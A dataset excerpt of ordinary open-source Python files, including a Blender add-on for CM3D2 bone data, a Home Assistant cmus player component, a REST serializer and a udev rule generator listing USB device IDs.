hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
485e47889cf0e06f86945cb9c271319ee0ab37ea | 6,749 | py | Python | CM3D2 Converter/misc_TEXT_HT_header.py | Algester/Blender-CM3D2-Converter | eb1df082ac72aa013dc996427bcee563b1fedaae | [
"Apache-2.0"
] | 22 | 2016-07-05T16:31:37.000Z | 2022-03-12T04:36:32.000Z | CM3D2 Converter/misc_TEXT_HT_header.py | Algester/Blender-CM3D2-Converter | eb1df082ac72aa013dc996427bcee563b1fedaae | [
"Apache-2.0"
] | 3 | 2020-06-07T01:25:47.000Z | 2020-11-20T12:45:49.000Z | CM3D2 Converter/misc_TEXT_HT_header.py | Algester/Blender-CM3D2-Converter | eb1df082ac72aa013dc996427bcee563b1fedaae | [
"Apache-2.0"
] | 9 | 2019-09-15T08:21:21.000Z | 2022-03-12T04:36:35.000Z | # "Text Editor" area → Header
import bpy
from . import common
from . import compat
# Add items to menus, etc.
@compat.BlRegister()
@compat.BlRegister()
@compat.BlRegister()
@compat.BlRegister()
| 37.494444 | 119 | 0.610016 | # "Text Editor" area → Header
import bpy
from . import common
from . import compat
# Add items to menus, etc.
def menu_func(self, context):
texts = bpy.data.texts
text_keys = texts.keys()
self.layout.label(text="CM3D2用:", icon_value=common.kiss_icon())
row = self.layout.row(align=True)
if 'BoneData' in text_keys:
txt = bpy.data.texts['BoneData']
line_count = 0
for line in txt.as_string().split('\n'):
if line:
line_count += 1
row.operator('text.show_text', icon='ARMATURE_DATA', text="BoneData (%d)" % line_count).name = 'BoneData'
if 'LocalBoneData' in text_keys:
txt = bpy.data.texts['LocalBoneData']
line_count = 0
for line in txt.as_string().split('\n'):
if line:
line_count += 1
row.operator('text.show_text', icon='BONE_DATA', text="LocalBoneData (%d)" % line_count).name = 'LocalBoneData'
if 'BoneData' in text_keys and 'LocalBoneData' in text_keys:
if 'BoneData' in texts:
if 'BaseBone' not in texts['BoneData']:
texts['BoneData']['BaseBone'] = ""
row.prop(texts['BoneData'], '["BaseBone"]', text="")
row.operator('text.copy_text_bone_data', icon='COPYDOWN', text="")
row.operator('text.paste_text_bone_data', icon='PASTEDOWN', text="")
if "Material:0" in text_keys:
self.layout.label(text="", icon='MATERIAL_DATA')
row = self.layout.row(align=True)
pass_count = 0
for i in range(99):
name = "Material:" + str(i)
if name in text_keys:
sub_row = row.row(align=True)
sub_row.scale_x = 0.5
sub_row.operator('text.show_text', text=str(i)).name = name
else:
pass_count += 1
if 9 < pass_count:
break
if "Material:0" in text_keys:
row.operator('text.remove_all_material_texts', icon='X', text="")
@compat.BlRegister()
class CNV_OT_show_text(bpy.types.Operator):
bl_idname = 'text.show_text'
bl_label = "テキストを表示"
bl_description = "指定したテキストをこの領域に表示します"
bl_options = {'REGISTER', 'UNDO'}
name = bpy.props.StringProperty(name="テキスト名")
@classmethod
def poll(cls, context):
return hasattr(context.space_data, 'text')
def execute(self, context):
context.space_data.text = bpy.data.texts[self.name]
return {'FINISHED'}
@compat.BlRegister()
class CNV_OT_copy_text_bone_data(bpy.types.Operator):
bl_idname = 'text.copy_text_bone_data'
bl_label = "テキストのボーン情報をコピー"
bl_description = "テキストのボーン情報をカスタムプロパティへ貼付ける形にしてクリップボードにコピーします"
bl_options = {'REGISTER', 'UNDO'}
@classmethod
def poll(cls, context):
texts = context.blend_data.texts
return 'BoneData' in texts and 'LocalBoneData' in texts
def execute(self, context):
output_text = ""
if 'BaseBone' in context.blend_data.texts['BoneData']:
output_text += "BaseBone:" + context.blend_data.texts['BoneData']['BaseBone'] + "\n"
for line in context.blend_data.texts['BoneData'].as_string().split('\n'):
if not line:
continue
output_text += "BoneData:" + line + "\n"
for line in context.blend_data.texts['LocalBoneData'].as_string().split('\n'):
if not line:
continue
output_text += "LocalBoneData:" + line + "\n"
context.window_manager.clipboard = output_text
self.report(type={'INFO'}, message="ボーン情報をクリップボードにコピーしました")
return {'FINISHED'}
@compat.BlRegister()
class CNV_OT_paste_text_bone_data(bpy.types.Operator):
bl_idname = 'text.paste_text_bone_data'
bl_label = "テキストのボーン情報を貼付け"
bl_description = "クリップボード内のボーン情報をテキストデータに貼付けます"
bl_options = {'REGISTER', 'UNDO'}
@classmethod
def poll(cls, context):
clipboard = context.window_manager.clipboard
return "BoneData:" in clipboard and "LocalBoneData:" in clipboard
def execute(self, context):
if "BoneData" in context.blend_data.texts:
bone_data_text = context.blend_data.texts["BoneData"]
bone_data_text.clear()
else:
bone_data_text = context.blend_data.texts.new("BoneData")
if "LocalBoneData" in context.blend_data.texts:
local_bone_data_text = context.blend_data.texts["LocalBoneData"]
local_bone_data_text.clear()
else:
local_bone_data_text = context.blend_data.texts.new("LocalBoneData")
clipboard = context.window_manager.clipboard
for line in clipboard.split("\n"):
if line.startswith('BaseBone:'):
                info = line[9:] # len('BaseBone:') == 9
bone_data_text['BaseBone'] = info
local_bone_data_text['BaseBone'] = info
continue
if line.startswith('BoneData:'):
if line.count(',') >= 4:
bone_data_text.write(line[9:] + "\n") # len('BoneData:') == 9
continue
if line.startswith('LocalBoneData:'):
if line.count(',') == 1:
local_bone_data_text.write(line[14:] + "\n") # len('LocalBoneData:') == 14
bone_data_text.current_line_index = 0
local_bone_data_text.current_line_index = 0
self.report(type={'INFO'}, message="ボーン情報をクリップボードから貼付けました")
return {'FINISHED'}
@compat.BlRegister()
class CNV_OT_remove_all_material_texts(bpy.types.Operator):
bl_idname = 'text.remove_all_material_texts'
bl_label = "マテリアル情報テキストを全削除"
bl_description = "CM3D2で使用できるマテリアルテキストを全て削除します"
bl_options = {'REGISTER', 'UNDO'}
is_keep_used_material = bpy.props.BoolProperty(name="使用する分は保管", default=True)
@classmethod
def poll(cls, context):
return "Material:0" in context.blend_data.texts
def invoke(self, context, event):
return context.window_manager.invoke_props_dialog(self)
def draw(self, context):
self.layout.prop(self, 'is_keep_used_material')
def execute(self, context):
remove_texts = []
pass_count = 0
for i in range(9999):
name = "Material:" + str(i)
if name in context.blend_data.texts:
remove_texts.append(context.blend_data.texts[name])
else:
pass_count += 1
if 10 < pass_count:
break
if self.is_keep_used_material:
ob = context.active_object
if ob:
remove_texts = remove_texts[len(ob.material_slots):]
for txt in remove_texts:
context.blend_data.texts.remove(txt)
return {'FINISHED'}
| 5,287 | 1,606 | 110 |
43589412bf6bbd0b8acf7e3f218cda6cdcadc108 | 116 | py | Python | app/util/__init__.py | DrunkenPandaFans/dj-panda | a3e0afa5edc9910299d46f167bf01abfb8ab1d0c | [
"MIT"
] | null | null | null | app/util/__init__.py | DrunkenPandaFans/dj-panda | a3e0afa5edc9910299d46f167bf01abfb8ab1d0c | [
"MIT"
] | null | null | null | app/util/__init__.py | DrunkenPandaFans/dj-panda | a3e0afa5edc9910299d46f167bf01abfb8ab1d0c | [
"MIT"
] | null | null | null | from loader import Loader
from metadataloader import WrongHeaderException
from metadataloader import MetaDataLoader
| 29 | 47 | 0.896552 | from loader import Loader
from metadataloader import WrongHeaderException
from metadataloader import MetaDataLoader
| 0 | 0 | 0 |
136d26974fe8ec6f8b20b7bb62924a94c94b870e | 6,952 | py | Python | homeassistant/components/media_player/cmus.py | shire210/home-assistant | 63cd8bbee6f1b74ae9c6c249ac820119a8a573d8 | [
"Apache-2.0"
] | 2 | 2017-02-25T00:27:06.000Z | 2017-02-25T03:09:30.000Z | homeassistant/components/media_player/cmus.py | shire210/home-assistant | 63cd8bbee6f1b74ae9c6c249ac820119a8a573d8 | [
"Apache-2.0"
] | 1 | 2017-03-10T22:17:06.000Z | 2017-03-10T22:17:06.000Z | homeassistant/components/media_player/cmus.py | shire210/home-assistant | 63cd8bbee6f1b74ae9c6c249ac820119a8a573d8 | [
"Apache-2.0"
] | 2 | 2018-06-03T11:14:44.000Z | 2018-11-04T18:18:12.000Z | """
Support for interacting with and controlling the cmus music player.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/media_player.cmus/
"""
import logging
import voluptuous as vol
from homeassistant.components.media_player import (
MEDIA_TYPE_MUSIC, MEDIA_TYPE_PLAYLIST, SUPPORT_NEXT_TRACK, SUPPORT_PAUSE,
SUPPORT_PREVIOUS_TRACK, SUPPORT_TURN_OFF, SUPPORT_TURN_ON, SUPPORT_PLAY,
SUPPORT_VOLUME_SET, SUPPORT_PLAY_MEDIA, SUPPORT_SEEK, PLATFORM_SCHEMA,
MediaPlayerDevice)
from homeassistant.const import (
STATE_OFF, STATE_PAUSED, STATE_PLAYING, CONF_HOST, CONF_NAME, CONF_PORT,
CONF_PASSWORD)
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['pycmus==0.1.0']
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = 'cmus'
DEFAULT_PORT = 3000
SUPPORT_CMUS = SUPPORT_PAUSE | SUPPORT_VOLUME_SET | SUPPORT_TURN_OFF | \
SUPPORT_TURN_ON | SUPPORT_PREVIOUS_TRACK | SUPPORT_NEXT_TRACK | \
SUPPORT_PLAY_MEDIA | SUPPORT_SEEK | SUPPORT_PLAY
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Inclusive(CONF_HOST, 'remote'): cv.string,
vol.Inclusive(CONF_PASSWORD, 'remote'): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
})
def setup_platform(hass, config, add_devices, discover_info=None):
"""Setup the CMUS platform."""
from pycmus import exceptions
host = config.get(CONF_HOST)
password = config.get(CONF_PASSWORD)
port = config.get(CONF_PORT)
name = config.get(CONF_NAME)
try:
cmus_remote = CmusDevice(host, password, port, name)
except exceptions.InvalidPassword:
_LOGGER.error("The provided password was rejected by cmus")
return False
add_devices([cmus_remote])
class CmusDevice(MediaPlayerDevice):
"""Representation of a running cmus."""
# pylint: disable=no-member
def __init__(self, server, password, port, name):
"""Initialize the CMUS device."""
from pycmus import remote
if server:
self.cmus = remote.PyCmus(
server=server, password=password, port=port)
auto_name = 'cmus-{}'.format(server)
else:
self.cmus = remote.PyCmus()
auto_name = 'cmus-local'
self._name = name or auto_name
self.status = {}
self.update()
def update(self):
"""Get the latest data and update the state."""
status = self.cmus.get_status_dict()
if not status:
_LOGGER.warning("Recieved no status from cmus")
else:
self.status = status
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def state(self):
"""Return the media state."""
if self.status.get('status') == 'playing':
return STATE_PLAYING
elif self.status.get('status') == 'paused':
return STATE_PAUSED
else:
return STATE_OFF
@property
def media_content_id(self):
"""Content ID of current playing media."""
return self.status.get('file')
@property
def content_type(self):
"""Content type of the current playing media."""
return MEDIA_TYPE_MUSIC
@property
def media_duration(self):
"""Duration of current playing media in seconds."""
return self.status.get('duration')
@property
def media_title(self):
"""Title of current playing media."""
return self.status['tag'].get('title')
@property
def media_artist(self):
"""Artist of current playing media, music track only."""
return self.status['tag'].get('artist')
@property
def media_track(self):
"""Track number of current playing media, music track only."""
return self.status['tag'].get('tracknumber')
@property
def media_album_name(self):
"""Album name of current playing media, music track only."""
return self.status['tag'].get('album')
@property
def media_album_artist(self):
"""Album artist of current playing media, music track only."""
return self.status['tag'].get('albumartist')
@property
def volume_level(self):
"""Return the volume level."""
left = self.status['set'].get('vol_left')[0]
right = self.status['set'].get('vol_right')[0]
if left != right:
volume = float(left + right) / 2
else:
volume = left
return int(volume)/100
@property
def supported_features(self):
"""Flag media player features that are supported."""
return SUPPORT_CMUS
def turn_off(self):
"""Service to send the CMUS the command to stop playing."""
self.cmus.player_stop()
def turn_on(self):
"""Service to send the CMUS the command to start playing."""
self.cmus.player_play()
def set_volume_level(self, volume):
"""Set volume level, range 0..1."""
self.cmus.set_volume(int(volume * 100))
def volume_up(self):
"""Function to send CMUS the command for volume up."""
left = self.status['set'].get('vol_left')
right = self.status['set'].get('vol_right')
if left != right:
current_volume = float(left + right) / 2
else:
current_volume = left
if current_volume <= 100:
self.cmus.set_volume(int(current_volume) + 5)
def volume_down(self):
"""Function to send CMUS the command for volume down."""
left = self.status['set'].get('vol_left')
right = self.status['set'].get('vol_right')
if left != right:
current_volume = float(left + right) / 2
else:
current_volume = left
if current_volume <= 100:
self.cmus.set_volume(int(current_volume) - 5)
def play_media(self, media_type, media_id, **kwargs):
"""Send the play command."""
if media_type in [MEDIA_TYPE_MUSIC, MEDIA_TYPE_PLAYLIST]:
self.cmus.player_play_file(media_id)
else:
_LOGGER.error(
"Invalid media type %s. Only %s and %s are supported",
media_type, MEDIA_TYPE_MUSIC, MEDIA_TYPE_PLAYLIST)
def media_pause(self):
"""Send the pause command."""
self.cmus.player_pause()
def media_next_track(self):
"""Send next track command."""
self.cmus.player_next()
def media_previous_track(self):
"""Send next track command."""
self.cmus.player_prev()
def media_seek(self, position):
"""Send seek command."""
self.cmus.seek(position)
def media_play(self):
"""Send the play command."""
self.cmus.player_play()
def media_stop(self):
"""Send the stop command."""
self.cmus.stop()
| 31.035714 | 77 | 0.631617 | """
Support for interacting with and controlling the cmus music player.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/media_player.cmus/
"""
import logging
import voluptuous as vol
from homeassistant.components.media_player import (
MEDIA_TYPE_MUSIC, MEDIA_TYPE_PLAYLIST, SUPPORT_NEXT_TRACK, SUPPORT_PAUSE,
SUPPORT_PREVIOUS_TRACK, SUPPORT_TURN_OFF, SUPPORT_TURN_ON, SUPPORT_PLAY,
SUPPORT_VOLUME_SET, SUPPORT_PLAY_MEDIA, SUPPORT_SEEK, PLATFORM_SCHEMA,
MediaPlayerDevice)
from homeassistant.const import (
STATE_OFF, STATE_PAUSED, STATE_PLAYING, CONF_HOST, CONF_NAME, CONF_PORT,
CONF_PASSWORD)
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['pycmus==0.1.0']
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = 'cmus'
DEFAULT_PORT = 3000
SUPPORT_CMUS = SUPPORT_PAUSE | SUPPORT_VOLUME_SET | SUPPORT_TURN_OFF | \
SUPPORT_TURN_ON | SUPPORT_PREVIOUS_TRACK | SUPPORT_NEXT_TRACK | \
SUPPORT_PLAY_MEDIA | SUPPORT_SEEK | SUPPORT_PLAY
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Inclusive(CONF_HOST, 'remote'): cv.string,
vol.Inclusive(CONF_PASSWORD, 'remote'): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
})
def setup_platform(hass, config, add_devices, discover_info=None):
"""Setup the CMUS platform."""
from pycmus import exceptions
host = config.get(CONF_HOST)
password = config.get(CONF_PASSWORD)
port = config.get(CONF_PORT)
name = config.get(CONF_NAME)
try:
cmus_remote = CmusDevice(host, password, port, name)
except exceptions.InvalidPassword:
_LOGGER.error("The provided password was rejected by cmus")
return False
add_devices([cmus_remote])
class CmusDevice(MediaPlayerDevice):
"""Representation of a running cmus."""
# pylint: disable=no-member
def __init__(self, server, password, port, name):
"""Initialize the CMUS device."""
from pycmus import remote
if server:
self.cmus = remote.PyCmus(
server=server, password=password, port=port)
auto_name = 'cmus-{}'.format(server)
else:
self.cmus = remote.PyCmus()
auto_name = 'cmus-local'
self._name = name or auto_name
self.status = {}
self.update()
def update(self):
"""Get the latest data and update the state."""
status = self.cmus.get_status_dict()
if not status:
_LOGGER.warning("Recieved no status from cmus")
else:
self.status = status
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def state(self):
"""Return the media state."""
if self.status.get('status') == 'playing':
return STATE_PLAYING
elif self.status.get('status') == 'paused':
return STATE_PAUSED
else:
return STATE_OFF
@property
def media_content_id(self):
"""Content ID of current playing media."""
return self.status.get('file')
@property
def content_type(self):
"""Content type of the current playing media."""
return MEDIA_TYPE_MUSIC
@property
def media_duration(self):
"""Duration of current playing media in seconds."""
return self.status.get('duration')
@property
def media_title(self):
"""Title of current playing media."""
return self.status['tag'].get('title')
@property
def media_artist(self):
"""Artist of current playing media, music track only."""
return self.status['tag'].get('artist')
@property
def media_track(self):
"""Track number of current playing media, music track only."""
return self.status['tag'].get('tracknumber')
@property
def media_album_name(self):
"""Album name of current playing media, music track only."""
return self.status['tag'].get('album')
@property
def media_album_artist(self):
"""Album artist of current playing media, music track only."""
return self.status['tag'].get('albumartist')
@property
def volume_level(self):
"""Return the volume level."""
left = self.status['set'].get('vol_left')[0]
right = self.status['set'].get('vol_right')[0]
if left != right:
volume = float(left + right) / 2
else:
volume = left
return int(volume)/100
@property
def supported_features(self):
"""Flag media player features that are supported."""
return SUPPORT_CMUS
def turn_off(self):
"""Service to send the CMUS the command to stop playing."""
self.cmus.player_stop()
def turn_on(self):
"""Service to send the CMUS the command to start playing."""
self.cmus.player_play()
def set_volume_level(self, volume):
"""Set volume level, range 0..1."""
self.cmus.set_volume(int(volume * 100))
def volume_up(self):
"""Function to send CMUS the command for volume up."""
left = self.status['set'].get('vol_left')
right = self.status['set'].get('vol_right')
if left != right:
current_volume = float(left + right) / 2
else:
current_volume = left
if current_volume <= 100:
self.cmus.set_volume(int(current_volume) + 5)
def volume_down(self):
"""Function to send CMUS the command for volume down."""
left = self.status['set'].get('vol_left')
right = self.status['set'].get('vol_right')
if left != right:
current_volume = float(left + right) / 2
else:
current_volume = left
if current_volume <= 100:
self.cmus.set_volume(int(current_volume) - 5)
def play_media(self, media_type, media_id, **kwargs):
"""Send the play command."""
if media_type in [MEDIA_TYPE_MUSIC, MEDIA_TYPE_PLAYLIST]:
self.cmus.player_play_file(media_id)
else:
_LOGGER.error(
"Invalid media type %s. Only %s and %s are supported",
media_type, MEDIA_TYPE_MUSIC, MEDIA_TYPE_PLAYLIST)
def media_pause(self):
"""Send the pause command."""
self.cmus.player_pause()
def media_next_track(self):
"""Send next track command."""
self.cmus.player_next()
def media_previous_track(self):
"""Send next track command."""
self.cmus.player_prev()
def media_seek(self, position):
"""Send seek command."""
self.cmus.seek(position)
def media_play(self):
"""Send the play command."""
self.cmus.player_play()
def media_stop(self):
"""Send the stop command."""
self.cmus.stop()
| 0 | 0 | 0 |
a3be5b5f50e1b1fb3f0cb8c0a060034c5377d0ef | 459 | py | Python | api/v2/serializers/details/help_link.py | xuhang57/atmosphere | f53fea2a74ee89ccc8852906799b1d9a7e9178b7 | [
"BSD-3-Clause"
] | null | null | null | api/v2/serializers/details/help_link.py | xuhang57/atmosphere | f53fea2a74ee89ccc8852906799b1d9a7e9178b7 | [
"BSD-3-Clause"
] | null | null | null | api/v2/serializers/details/help_link.py | xuhang57/atmosphere | f53fea2a74ee89ccc8852906799b1d9a7e9178b7 | [
"BSD-3-Clause"
] | null | null | null | from rest_framework import serializers
from rest_framework.exceptions import ValidationError
from core.models.template import HelpLink
| 24.157895 | 69 | 0.649237 | from rest_framework import serializers
from rest_framework.exceptions import ValidationError
from core.models.template import HelpLink
class HelpLinkSerializer(serializers.ModelSerializer):
def create(self, validated_data):
raise ValidationError("Cannot create new help links via API")
class Meta:
model = HelpLink
fields = (
'link_key',
'topic',
'context',
'href'
)
| 82 | 217 | 23 |
729bfaaaa4f5e69da4fae3b06567759718e758f5 | 238 | py | Python | code/utils/__init__.py | niuwk/infonets | 274e97c9a86144dd52cbe90caffff578a2f5d178 | [
"BSD-3-Clause"
] | 8 | 2018-06-20T23:20:43.000Z | 2020-01-12T01:32:06.000Z | code/utils/__init__.py | niuwk/infonets | 274e97c9a86144dd52cbe90caffff578a2f5d178 | [
"BSD-3-Clause"
] | null | null | null | code/utils/__init__.py | niuwk/infonets | 274e97c9a86144dd52cbe90caffff578a2f5d178 | [
"BSD-3-Clause"
] | 4 | 2018-06-26T20:28:13.000Z | 2021-06-17T13:39:56.000Z | from __future__ import absolute_import, division, print_function, unicode_literals
from .config import *
from .data import *
from .display import *
from .helper import *
from .methods import *
from .misc import *
from .whiten import *
| 19.833333 | 82 | 0.768908 | from __future__ import absolute_import, division, print_function, unicode_literals
from .config import *
from .data import *
from .display import *
from .helper import *
from .methods import *
from .misc import *
from .whiten import *
| 0 | 0 | 0 |
0ae15f7dfa871a72cf29d7ba864765e0b6e824d0 | 5,906 | py | Python | generate_rules.py | denilsonsa/udev-not-joystick | 030ee83f50c0ffb10becf7a3afa847fef3bf810b | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | 122 | 2015-10-25T18:03:01.000Z | 2022-03-22T23:32:51.000Z | generate_rules.py | denilsonsa/udev-not-joystick | 030ee83f50c0ffb10becf7a3afa847fef3bf810b | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | 36 | 2015-10-25T12:40:37.000Z | 2022-02-13T20:39:16.000Z | generate_rules.py | denilsonsa/udev-not-joystick | 030ee83f50c0ffb10becf7a3afa847fef3bf810b | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | 41 | 2015-10-28T04:34:07.000Z | 2021-12-19T23:51:41.000Z | #!/usr/bin/env python3
import os.path
import textwrap
# List of tuples ('idVendor', 'idProduct'), as four hexadecimal digits.
DEVICES = [
# Microsoft Microsoft Wireless Optical Desktop® 2.10
# Microsoft Wireless Desktop - Comfort Edition
('045e', '009d'),
# Microsoft Microsoft® Digital Media Pro Keyboard
# Microsoft Corp. Digital Media Pro Keyboard
('045e', '00b0'),
# Microsoft Microsoft® Digital Media Keyboard
# Microsoft Corp. Digital Media Keyboard 1.0A
('045e', '00b4'),
# Microsoft Microsoft® Digital Media Keyboard 3000
('045e', '0730'),
# Microsoft Microsoft® 2.4GHz Transceiver v6.0
# Microsoft Microsoft® 2.4GHz Transceiver v8.0
# Microsoft Corp. Nano Transceiver v1.0 for Bluetooth
# Microsoft Wireless Mobile Mouse 1000
# Microsoft Wireless Desktop 3000
('045e', '0745'),
# Microsoft® SideWinder(TM) 2.4GHz Transceiver
('045e', '0748'),
# Microsoft Corp. Wired Keyboard 600
('045e', '0750'),
# Microsoft Corp. Sidewinder X4 keyboard
('045e', '0768'),
# Microsoft Corp. Arc Touch Mouse Transceiver
('045e', '0773'),
# Microsoft® 2.4GHz Transceiver v9.0
# Microsoft® Nano Transceiver v2.1
# Microsoft Sculpt Ergonomic Keyboard (5KV-00001)
('045e', '07a5'),
# Microsoft® Nano Transceiver v1.0
# Microsoft Wireless Keyboard 800
('045e', '07b2'),
# Microsoft® Nano Transceiver v2.0
('045e', '0800'),
('046d', 'c30a'), # Logitech, Inc. iTouch Composite keboard
('04d9', 'a0df'), # Tek Syndicate Mouse (E-Signal USB Gaming Mouse)
# List of Wacom devices at: http://linuxwacom.sourceforge.net/wiki/index.php/Device_IDs
('056a', '0010'), # Wacom ET-0405 Graphire
('056a', '0011'), # Wacom ET-0405A Graphire2 (4x5)
('056a', '0012'), # Wacom ET-0507A Graphire2 (5x7)
('056a', '0013'), # Wacom CTE-430 Graphire3 (4x5)
('056a', '0014'), # Wacom CTE-630 Graphire3 (6x8)
('056a', '0015'), # Wacom CTE-440 Graphire4 (4x5)
('056a', '0016'), # Wacom CTE-640 Graphire4 (6x8)
('056a', '0017'), # Wacom CTE-450 Bamboo Fun (4x5)
('056a', '0018'), # Wacom CTE-650 Bamboo Fun 6x8
('056a', '0019'), # Wacom CTE-631 Bamboo One
('056a', '00d1'), # Wacom Bamboo Pen and Touch CTH-460
('056a', '030e'), # Wacom Intuos Pen (S) CTL-480
('09da', '054f'), # A4 Tech Co., G7 750 mouse
('09da', '1410'), # A4 Tech Co., Ltd Bloody AL9 mouse
('09da', '3043'), # A4 Tech Co., Ltd Bloody R8A Gaming Mouse
('09da', '31b5'), # A4 Tech Co., Ltd Bloody TL80 Terminator Laser Gaming Mouse
('09da', '3997'), # A4 Tech Co., Ltd Bloody RT7 Terminator Wireless
('09da', '3f8b'), # A4 Tech Co., Ltd Bloody V8 mouse
('09da', '51f4'), # Modecom MC-5006 Keyboard
('09da', '5589'), # A4 Tech Co., Ltd Terminator TL9 Laser Gaming Mouse
('09da', '7b22'), # A4 Tech Co., Ltd Bloody V5
('09da', '7f2d'), # A4 Tech Co., Ltd Bloody R3 mouse
('09da', '8090'), # A4 Tech Co., Ltd X-718BK Oscar Optical Gaming Mouse
('09da', '9033'), # A4 Tech Co., X7 X-705K
('09da', '9066'), # A4 Tech Co., Sharkoon Fireglider Optical
('09da', '9090'), # A4 Tech Co., Ltd XL-730K / XL-750BK / XL-755BK Laser Mouse
('09da', '90c0'), # A4 Tech Co., Ltd X7 G800V keyboard
('09da', 'f012'), # A4 Tech Co., Ltd Bloody V7 mouse
('09da', 'f32a'), # A4 Tech Co., Ltd Bloody B540 keyboard
('09da', 'f613'), # A4 Tech Co., Ltd Bloody V2 mouse
('09da', 'f624'), # A4 Tech Co., Ltd Bloody B120 Keyboard
('1b1c', '1b3c'), # Corsair Harpoon RGB gaming mouse
('1d57', 'ad03'), # [T3] 2.4GHz and IR Air Mouse Remote Control
('1e7d', '2e4a'), # Roccat Tyon Mouse
('20a0', '422d'), # Winkeyless.kr Keyboards
('2516', '001f'), # Cooler Master Storm Mizar Mouse
('2516', '0028'), # Cooler Master Storm Alcor Mouse
]
if __name__ == '__main__':
main()
| 41.886525 | 186 | 0.629529 | #!/usr/bin/env python3
import os.path
import textwrap
# List of tuples ('idVendor', 'idProduct'), as four hexadecimal digits.
DEVICES = [
# Microsoft Microsoft Wireless Optical Desktop® 2.10
# Microsoft Wireless Desktop - Comfort Edition
('045e', '009d'),
# Microsoft Microsoft® Digital Media Pro Keyboard
# Microsoft Corp. Digital Media Pro Keyboard
('045e', '00b0'),
# Microsoft Microsoft® Digital Media Keyboard
# Microsoft Corp. Digital Media Keyboard 1.0A
('045e', '00b4'),
# Microsoft Microsoft® Digital Media Keyboard 3000
('045e', '0730'),
# Microsoft Microsoft® 2.4GHz Transceiver v6.0
# Microsoft Microsoft® 2.4GHz Transceiver v8.0
# Microsoft Corp. Nano Transceiver v1.0 for Bluetooth
# Microsoft Wireless Mobile Mouse 1000
# Microsoft Wireless Desktop 3000
('045e', '0745'),
# Microsoft® SideWinder(TM) 2.4GHz Transceiver
('045e', '0748'),
# Microsoft Corp. Wired Keyboard 600
('045e', '0750'),
# Microsoft Corp. Sidewinder X4 keyboard
('045e', '0768'),
# Microsoft Corp. Arc Touch Mouse Transceiver
('045e', '0773'),
# Microsoft® 2.4GHz Transceiver v9.0
# Microsoft® Nano Transceiver v2.1
# Microsoft Sculpt Ergonomic Keyboard (5KV-00001)
('045e', '07a5'),
# Microsoft® Nano Transceiver v1.0
# Microsoft Wireless Keyboard 800
('045e', '07b2'),
# Microsoft® Nano Transceiver v2.0
('045e', '0800'),
('046d', 'c30a'), # Logitech, Inc. iTouch Composite keboard
('04d9', 'a0df'), # Tek Syndicate Mouse (E-Signal USB Gaming Mouse)
# List of Wacom devices at: http://linuxwacom.sourceforge.net/wiki/index.php/Device_IDs
('056a', '0010'), # Wacom ET-0405 Graphire
('056a', '0011'), # Wacom ET-0405A Graphire2 (4x5)
('056a', '0012'), # Wacom ET-0507A Graphire2 (5x7)
('056a', '0013'), # Wacom CTE-430 Graphire3 (4x5)
('056a', '0014'), # Wacom CTE-630 Graphire3 (6x8)
('056a', '0015'), # Wacom CTE-440 Graphire4 (4x5)
('056a', '0016'), # Wacom CTE-640 Graphire4 (6x8)
('056a', '0017'), # Wacom CTE-450 Bamboo Fun (4x5)
('056a', '0018'), # Wacom CTE-650 Bamboo Fun 6x8
('056a', '0019'), # Wacom CTE-631 Bamboo One
('056a', '00d1'), # Wacom Bamboo Pen and Touch CTH-460
('056a', '030e'), # Wacom Intuos Pen (S) CTL-480
('09da', '054f'), # A4 Tech Co., G7 750 mouse
('09da', '1410'), # A4 Tech Co., Ltd Bloody AL9 mouse
('09da', '3043'), # A4 Tech Co., Ltd Bloody R8A Gaming Mouse
('09da', '31b5'), # A4 Tech Co., Ltd Bloody TL80 Terminator Laser Gaming Mouse
('09da', '3997'), # A4 Tech Co., Ltd Bloody RT7 Terminator Wireless
('09da', '3f8b'), # A4 Tech Co., Ltd Bloody V8 mouse
('09da', '51f4'), # Modecom MC-5006 Keyboard
('09da', '5589'), # A4 Tech Co., Ltd Terminator TL9 Laser Gaming Mouse
('09da', '7b22'), # A4 Tech Co., Ltd Bloody V5
('09da', '7f2d'), # A4 Tech Co., Ltd Bloody R3 mouse
